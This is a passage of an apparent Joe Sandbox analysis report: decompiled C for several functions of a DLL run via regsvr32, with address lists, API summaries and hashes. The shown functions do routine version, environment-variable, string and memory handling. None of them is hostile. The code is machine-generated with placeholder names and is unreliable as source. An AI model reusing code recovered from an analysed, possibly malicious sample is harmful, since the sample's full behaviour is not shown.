				 *((intOrPtr*)(_t118 + 0x54)) =  ~_t72 + 0x7005;
				 *((intOrPtr*)(_t118 + 0x1c4)) = 0;
				_t102 = _t118 + 0x80;
				 *_t102 = 0;
				_t116 = _t118 + 0xc0;
				 *_t116 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)))) =  *((intOrPtr*)(_t119 + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x1c)) = _t116;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x20)) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t119 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x24)) = _t102;
				_t103 = 0x40;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x28) = _t103;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) |  *(_t119 + 0x14) | 0x00080020;
				if(( *(_t119 + 0x14) & _t103) != 0) {
					_t92 =  *((intOrPtr*)(_t118 + 0x74));
					_t48 = _t92 + 0x34;
					 *_t48 =  *(_t92 + 0x34) & 0xff7fffff;
					_t129 =  *_t48;
				}
				_t82 = E1001E302(0, _t116, _t118, _t129);
				_t104 =  *((intOrPtr*)(_t118 + 0x74));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 8)) =  *((intOrPtr*)(_t82 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x44)) = E1003FF42;
				if( *((intOrPtr*)(_t119 - 0xac)) != 0) {
					E1000A0B7(0, _t104, _t116, _t118, _t119, _t116, 0x104,  *((intOrPtr*)(_t119 - 0xac)), 0xffffffff);
				}
				if( *((intOrPtr*)(_t119 - 0xa8)) != 0) {
					_t116 = _t118 + 0x7c;
					L100011E5(_t118 + 0x7c,  *((intOrPtr*)(_t119 - 0xa8)));
					_t88 = L100011F4(_t118 + 0x7c, 0);
					while(1) {
						_t89 = E1004CBA9(_t88, 0x7c);
						if(_t89 == 0) {
							break;
						}
						 *_t89 = 0;
						_t88 = _t89 + 1;
						__eflags = _t89 + 1;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0xc)) =  *((intOrPtr*)(_t118 + 0x7c));
				}
				return E10047739(0, _t116, _t118);
			}
















                                                                                                                0x1003850f
                                                                                                                0x1003850f
                                                                                                                0x10038519
                                                                                                                0x10038521
                                                                                                                0x1003852a
                                                                                                                0x10038534
                                                                                                                0x10038539
                                                                                                                0x1003853f
                                                                                                                0x10038547
                                                                                                                0x1003854a
                                                                                                                0x10038550
                                                                                                                0x10038558
                                                                                                                0x1003855c
                                                                                                                0x1003855e
                                                                                                                0x1003856c
                                                                                                                0x10038571
                                                                                                                0x1003857b
                                                                                                                0x10038581
                                                                                                                0x1003858e
                                                                                                                0x100385a0
                                                                                                                0x100385a0
                                                                                                                0x10038590
                                                                                                                0x10038597
                                                                                                                0x1003859e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003859e
                                                                                                                0x1003858e
                                                                                                                0x100385aa
                                                                                                                0x100385af
                                                                                                                0x100385b1
                                                                                                                0x100385b2
                                                                                                                0x100385b5
                                                                                                                0x100385b7
                                                                                                                0x100385b7
                                                                                                                0x100385c1
                                                                                                                0x100385c6
                                                                                                                0x100385cc
                                                                                                                0x100385d4
                                                                                                                0x100385db
                                                                                                                0x100385e1
                                                                                                                0x100385e7
                                                                                                                0x100385ed
                                                                                                                0x100385ef
                                                                                                                0x100385f5
                                                                                                                0x100385f7
                                                                                                                0x100385ff
                                                                                                                0x10038605
                                                                                                                0x1003860f
                                                                                                                0x10038618
                                                                                                                0x10038620
                                                                                                                0x10038621
                                                                                                                0x1003862d
                                                                                                                0x10038633
                                                                                                                0x10038635
                                                                                                                0x10038638
                                                                                                                0x10038638
                                                                                                                0x10038638
                                                                                                                0x10038638
                                                                                                                0x1003863f
                                                                                                                0x1003864d
                                                                                                                0x10038650
                                                                                                                0x10038656
                                                                                                                0x1003865d
                                                                                                                0x1003866d
                                                                                                                0x10038672
                                                                                                                0x1003867b
                                                                                                                0x10038683
                                                                                                                0x10038688
                                                                                                                0x10038690
                                                                                                                0x1003869a
                                                                                                                0x1003869d
                                                                                                                0x100386a6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10038697
                                                                                                                0x10038699
                                                                                                                0x10038699
                                                                                                                0x10038699
                                                                                                                0x100386ae
                                                                                                                0x100386ae
                                                                                                                0x100386b8

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10038519
                                                                                                                  • Part of subcall function 1001B6E7: _memset.LIBCMT ref: 1001B6FE
                                                                                                                • _memset.LIBCMT ref: 1003856C
                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000,00000018), ref: 10038581
                                                                                                                • _malloc.LIBCMT ref: 100385AA
                                                                                                                • _memset.LIBCMT ref: 100385C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog3_Version_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1339555267-0
                                                                                                                • Opcode ID: 1422dff509074d4d1f73794e736090bdd5341f7153cd0141cfaf232a2483be12
                                                                                                                • Instruction ID: f295394b957d1c0ebfc845127732de9d50591da18fa0336fb8d5660b5ee4c552
                                                                                                                • Opcode Fuzzy Hash: 1422dff509074d4d1f73794e736090bdd5341f7153cd0141cfaf232a2483be12
                                                                                                                • Instruction Fuzzy Hash: BF515DB4900B45DFDB22CF64C981A9ABBE0FF09314F1146ADEA999B361C734E944CF11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001019 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E10001019(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t35;
				int _t44;
				int _t51;
				long _t64;
				void* _t65;
				void* _t80;
				void* _t83;
				void* _t85;
				void* _t86;
				signed int _t89;
				void* _t91;

				_t80 = __edx;
				_t89 = _t91 - 0x104;
				_t35 =  *0x100b9e70; // 0xbb35530
				 *(_t89 + 0x108) = _t35 ^ _t89;
				_push(8);
				E1004764D(0x1008d836, __ebx, __edi, __esi);
				 *(_t89 - 0x14) =  *(_t89 + 0x118);
				 *(_t89 + 0x84) = 0;
				 *((intOrPtr*)(_t89 - 4)) = 0;
				L10001285(_t89,  *((intOrPtr*)(_t89 + 0x114)));
				_t85 = GetEnvironmentVariableA;
				 *((char*)(_t89 - 4)) = 1;
				_t64 = GetEnvironmentVariableA( *_t89, 0, 0);
				if(_t64 == 0 || _t64 == 0xffffffff) {
					L17:
					__eflags =  *_t89 - _t89 + 4;
					if(__eflags != 0) {
						_push( *_t89);
						E100470E9(_t64, 0, _t85, __eflags);
					}
					_t43 = _t89 + 0x88;
					__eflags =  *(_t89 + 0x84) - _t89 + 0x88;
					if( *(_t89 + 0x84) != _t89 + 0x88) {
						L10001456(_t43, _t89 + 0x84);
					}
					_t44 = 0;
					__eflags = 0;
				} else {
					_t9 = _t64 + 1; // 0x1
					L100013D9(_t89 + 0x84, _t9);
					if(GetEnvironmentVariableA( *_t89,  *(_t89 + 0x84), _t64) == 0) {
						goto L17;
					} else {
						_t51 =  *0x100bb480();
						_t88 = MultiByteToWideChar;
						_t66 = MultiByteToWideChar(_t51, 0,  *(_t89 + 0x84), 0xffffffff, 0, 0);
						 *(_t89 - 0x10) = _t66;
						if( *((intOrPtr*)(_t89 + 0x11c)) != 0) {
							__eflags =  *((intOrPtr*)(_t89 + 0x11c)) - _t66;
							if( *((intOrPtr*)(_t89 + 0x11c)) >= _t66) {
								_t66 =  *(_t89 + 0x84);
								 *(_t89 - 0x10) = MultiByteToWideChar( *0x100bb480(), 0,  *(_t89 + 0x84), 0xffffffff,  *(_t89 - 0x14),  *(_t89 - 0x10));
							}
							__eflags =  *_t89 - _t89 + 4;
							if(__eflags != 0) {
								_push( *_t89);
								E100470E9(_t66, 0, _t88, __eflags);
							}
							_t54 = _t89 + 0x88;
							__eflags =  *(_t89 + 0x84) - _t89 + 0x88;
							if( *(_t89 + 0x84) != _t89 + 0x88) {
								L10001456(_t54, _t89 + 0x84);
							}
							_t44 =  *(_t89 - 0x10);
						} else {
							_t99 =  *_t89 - _t89 + 4;
							if( *_t89 != _t89 + 4) {
								_push( *_t89);
								E100470E9(_t66, 0, MultiByteToWideChar, _t99);
							}
							_t60 = _t89 + 0x88;
							if( *(_t89 + 0x84) != _t89 + 0x88) {
								L10001456(_t60, _t89 + 0x84);
							}
							_t44 = _t66;
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
				_pop(_t83);
				_pop(_t86);
				_pop(_t65);
				return E1004763E(_t44, _t65,  *(_t89 + 0x108) ^ _t89, _t80, _t83, _t86);
			}















                                                                                                                0x10001019
                                                                                                                0x10002a14
                                                                                                                0x10002a18
                                                                                                                0x10002a1f
                                                                                                                0x10002a25
                                                                                                                0x10002a2c
                                                                                                                0x10002a3f
                                                                                                                0x10002a42
                                                                                                                0x10002a4c
                                                                                                                0x10002a4f
                                                                                                                0x10002a54
                                                                                                                0x10002a5f
                                                                                                                0x10002a65
                                                                                                                0x10002a69
                                                                                                                0x10002b44
                                                                                                                0x10002b47
                                                                                                                0x10002b4a
                                                                                                                0x10002b4c
                                                                                                                0x10002b4f
                                                                                                                0x10002b54
                                                                                                                0x10002b55
                                                                                                                0x10002b5b
                                                                                                                0x10002b61
                                                                                                                0x10002b69
                                                                                                                0x10002b69
                                                                                                                0x10002b6e
                                                                                                                0x10002b6e
                                                                                                                0x10002a78
                                                                                                                0x10002a78
                                                                                                                0x10002a82
                                                                                                                0x10002a95
                                                                                                                0x00000000
                                                                                                                0x10002a9b
                                                                                                                0x10002aa1
                                                                                                                0x10002aac
                                                                                                                0x10002abc
                                                                                                                0x10002abe
                                                                                                                0x10002ac1
                                                                                                                0x10002af1
                                                                                                                0x10002af7
                                                                                                                0x10002af9
                                                                                                                0x10002b12
                                                                                                                0x10002b12
                                                                                                                0x10002b18
                                                                                                                0x10002b1b
                                                                                                                0x10002b1d
                                                                                                                0x10002b20
                                                                                                                0x10002b25
                                                                                                                0x10002b26
                                                                                                                0x10002b2c
                                                                                                                0x10002b32
                                                                                                                0x10002b3a
                                                                                                                0x10002b3a
                                                                                                                0x10002b3f
                                                                                                                0x10002ac3
                                                                                                                0x10002ac6
                                                                                                                0x10002ac9
                                                                                                                0x10002acb
                                                                                                                0x10002ace
                                                                                                                0x10002ad3
                                                                                                                0x10002ad4
                                                                                                                0x10002ae0
                                                                                                                0x10002ae8
                                                                                                                0x10002ae8
                                                                                                                0x10002aed
                                                                                                                0x10002aed
                                                                                                                0x10002ac1
                                                                                                                0x10002a95
                                                                                                                0x10002b73
                                                                                                                0x10002b7b
                                                                                                                0x10002b7c
                                                                                                                0x10002b7d
                                                                                                                0x10002b92

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10002A2C
                                                                                                                • GetEnvironmentVariableA.KERNEL32(?,00000000,00000000,?,00000008), ref: 10002A63
                                                                                                                • GetEnvironmentVariableA.KERNEL32(?,?,00000000,00000001), ref: 10002A91
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 10002AB4
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 10002B10
                                                                                                                  • Part of subcall function 100470E9: __lock.LIBCMT ref: 10047107
                                                                                                                  • Part of subcall function 100470E9: ___sbh_find_block.LIBCMT ref: 10047112
                                                                                                                  • Part of subcall function 100470E9: ___sbh_free_block.LIBCMT ref: 10047121
                                                                                                                  • Part of subcall function 100470E9: HeapFree.KERNEL32(00000000,?,100B59B0), ref: 10047151
                                                                                                                  • Part of subcall function 100470E9: GetLastError.KERNEL32(?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001,00000001,?,10051765,0000000D,100B5E08), ref: 10047162
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharEnvironmentMultiVariableWide$ErrorFreeH_prolog3HeapLast___sbh_find_block___sbh_free_block__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3879487779-0
                                                                                                                • Opcode ID: 3fefc56506f4373e2cee5d46a2f543389d890174a798ff63ba7b94a952f91040
                                                                                                                • Instruction ID: b39ed74ae4ee6fdc897746ccce5b9efe2c84ee4406a20ebe1584f394e1056a1b
                                                                                                                • Opcode Fuzzy Hash: 3fefc56506f4373e2cee5d46a2f543389d890174a798ff63ba7b94a952f91040
                                                                                                                • Instruction Fuzzy Hash: 38415531900189EBEF74DF64CD81ADE77B9FF44390F50812AEA59DA195EF70AA04CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002BE83 Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1002BE83(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E1004764D(0x100901ae, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x1002c043) & 0x000000ff) * 4 +  &M1002C01B))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E1002C4F3( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E100184C0();
							__ecx = __ebp + 0xc;
							__eax = L1000140B(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = L10001276(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = L1000CDFE(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = L1000CE52(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E1002B00E( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E1002BD4A(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E100184C0();
							__ecx = __ebp + 0xc;
							__eax = L1000140B(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E100147D9(__ebx, __ebp + 0xc, __edx, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = L100013E3( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E10047725(_t56);
			}






                                                                                                                0x1002be83
                                                                                                                0x1002be8a
                                                                                                                0x1002be94
                                                                                                                0x1002be9d
                                                                                                                0x1002c010
                                                                                                                0x1002c010
                                                                                                                0x1002bea3
                                                                                                                0x1002beaa
                                                                                                                0x00000000
                                                                                                                0x1002bed0
                                                                                                                0x1002bed3
                                                                                                                0x1002bed8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002beb1
                                                                                                                0x1002beb4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002bf84
                                                                                                                0x1002bf87
                                                                                                                0x1002bf8a
                                                                                                                0x1002bf8f
                                                                                                                0x1002bf94
                                                                                                                0x1002bf96
                                                                                                                0x1002bf98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002bec6
                                                                                                                0x1002bec9
                                                                                                                0x1002beb9
                                                                                                                0x1002beb9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002bfec
                                                                                                                0x1002bff2
                                                                                                                0x1002bff5
                                                                                                                0x1002bfff
                                                                                                                0x1002c002
                                                                                                                0x1002c009
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002bfa1
                                                                                                                0x1002bfa4
                                                                                                                0x1002bfa9
                                                                                                                0x1002bfaf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002bee0
                                                                                                                0x1002bee4
                                                                                                                0x1002bee6
                                                                                                                0x1002bee9
                                                                                                                0x1002beec
                                                                                                                0x1002bf02
                                                                                                                0x1002bf14
                                                                                                                0x1002bf17
                                                                                                                0x1002bf1d
                                                                                                                0x1002bf20
                                                                                                                0x1002bf23
                                                                                                                0x1002bf23
                                                                                                                0x1002bf28
                                                                                                                0x1002bf2e
                                                                                                                0x1002bf31
                                                                                                                0x1002bf36
                                                                                                                0x1002bf3d
                                                                                                                0x1002bf38
                                                                                                                0x1002bf38
                                                                                                                0x1002bf38
                                                                                                                0x1002bf40
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002bf48
                                                                                                                0x1002bf4c
                                                                                                                0x1002bf68
                                                                                                                0x1002bf68
                                                                                                                0x1002bf6b
                                                                                                                0x1002bf70
                                                                                                                0x1002bf73
                                                                                                                0x1002bf75
                                                                                                                0x1002bf76
                                                                                                                0x1002bf79
                                                                                                                0x1002bf7c
                                                                                                                0x00000000
                                                                                                                0x1002bf4e
                                                                                                                0x1002bf4e
                                                                                                                0x1002bf51
                                                                                                                0x1002bf57
                                                                                                                0x1002bf59
                                                                                                                0x1002bf5e
                                                                                                                0x1002bf62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002bf62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002bfb7
                                                                                                                0x1002bfbd
                                                                                                                0x1002bfc0
                                                                                                                0x1002bfc5
                                                                                                                0x1002bfc5
                                                                                                                0x1002bfc5
                                                                                                                0x1002bfc9
                                                                                                                0x1002bfc9
                                                                                                                0x1002bfcc
                                                                                                                0x1002bfcf
                                                                                                                0x1002bfd4
                                                                                                                0x1002bfd9
                                                                                                                0x1002bfdc
                                                                                                                0x1002bfdf
                                                                                                                0x1002bfe2
                                                                                                                0x1002bebe
                                                                                                                0x1002bec0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002beaa
                                                                                                                0x1002c012
                                                                                                                0x1002c017

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002BE8A
                                                                                                                • SendMessageA.USER32 ref: 1002BF02
                                                                                                                • GetBkColor.GDI32(?), ref: 1002BF0B
                                                                                                                • GetTextColor.GDI32(?), ref: 1002BF17
                                                                                                                • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 1002BFA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 187318432-0
                                                                                                                • Opcode ID: d22433670a3056a702978a9435578d9b71aa6b37bc2a414f49c1d96738fc2e7c
                                                                                                                • Instruction ID: 0c5270fe824628972eb2d5b37537cdc2cc1a572c30690f40372f275bdb27a436
                                                                                                                • Opcode Fuzzy Hash: d22433670a3056a702978a9435578d9b71aa6b37bc2a414f49c1d96738fc2e7c
                                                                                                                • Instruction Fuzzy Hash: 30416738400B0ADFDB20DFA4D88599EB7F0FF08314F618959F99A9B2A1D774A940DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000AA09 Relevance: 7.6, APIs: 5, Instructions: 104stringmemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E1000AA09(void* _a4, short _a20, short _a24, short _a28, short _a32, short _a36, short _a40, WCHAR* _a44, WCHAR* _a48) {
				signed int _v8;
				char _v24;
				WCHAR* _v28;
				void* _v32;
				WCHAR* _v36;
				short _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				long _t48;
				void* _t49;
				WCHAR* _t67;
				void* _t70;
				WCHAR* _t72;
				short* _t73;
				short* _t76;
				signed int _t78;
				void* _t79;

				_t45 =  *0x100b9e70; // 0xbb35530
				_v8 = _t45 ^ _t78;
				_t67 = _a48;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t72 = _a44;
				_v36 = _t72;
				_v28 = _t67;
				if(_t72 == 0) {
					_t76 = 0;
				} else {
					_t76 = lstrlenW(_t72) + 1;
				}
				if(_t67 == 0 ||  *_t67 == 0) {
					_v28 = _t72;
					_t73 = _t76;
				} else {
					_t73 = lstrlenW(_t67) + 1;
				}
				_t48 = _t73 + _t76 + _t73 + _t76 + 0x34;
				_v40 = _t48;
				_t49 = GlobalAlloc(0x2042, _t48);
				_v32 = _t49;
				if(_t49 != 0) {
					_t67 = GlobalLock(_t49);
					if(_v36 == 0) {
						_t67[0x16] = _t67[0x16] & 0x00000000;
					} else {
						_t16 =  &(_t67[0x1a]); // 0x34
						_t67[0x16] = 0x34;
						L1000146A(_t67, _t70, _t73, _t76, _t78, _t16, _t76, _v36);
						_t79 = _t79 + 0xc;
					}
					if(_v28 == 0) {
						_t67[0x18] = _t67[0x18] & 0x00000000;
					} else {
						_t23 =  &(_t76[0x1a]); // 0x34
						_t67[0x18] = _t76 + _t23;
						L1000146A(_t67, _t70, _t73, _t76, _t78, _t67 + _t76 + _t23, _t73, _v28);
					}
					 *_t67 = _v40;
					_t67[0xa] = _a20;
					_t32 =  &(_t67[2]); // 0x4
					_t73 = _t32;
					_t76 =  &_v24;
					asm("movsd");
					_t67[0xc] = _a24;
					asm("movsd");
					_t67[0xe] = _a28;
					_t67[0x10] = _a32;
					asm("movsd");
					_t67[0x12] = _a36;
					asm("movsd");
					_t67[0x14] = _a40;
					GlobalUnlock(_v32);
					_t49 = _v32;
				}
				return E1004763E(_t49, _t67, _v8 ^ _t78, _t70, _t73, _t76);
			}























                                                                                                                0x1000aa0f
                                                                                                                0x1000aa16
                                                                                                                0x1000aa1a
                                                                                                                0x1000aa25
                                                                                                                0x1000aa26
                                                                                                                0x1000aa27
                                                                                                                0x1000aa28
                                                                                                                0x1000aa29
                                                                                                                0x1000aa2e
                                                                                                                0x1000aa31
                                                                                                                0x1000aa34
                                                                                                                0x1000aa42
                                                                                                                0x1000aa36
                                                                                                                0x1000aa3f
                                                                                                                0x1000aa3f
                                                                                                                0x1000aa46
                                                                                                                0x1000aa5a
                                                                                                                0x1000aa5d
                                                                                                                0x1000aa4e
                                                                                                                0x1000aa57
                                                                                                                0x1000aa57
                                                                                                                0x1000aa62
                                                                                                                0x1000aa6c
                                                                                                                0x1000aa6f
                                                                                                                0x1000aa77
                                                                                                                0x1000aa7a
                                                                                                                0x1000aa8b
                                                                                                                0x1000aa8d
                                                                                                                0x1000aaa8
                                                                                                                0x1000aa8f
                                                                                                                0x1000aa92
                                                                                                                0x1000aa97
                                                                                                                0x1000aa9e
                                                                                                                0x1000aaa3
                                                                                                                0x1000aaa3
                                                                                                                0x1000aab0
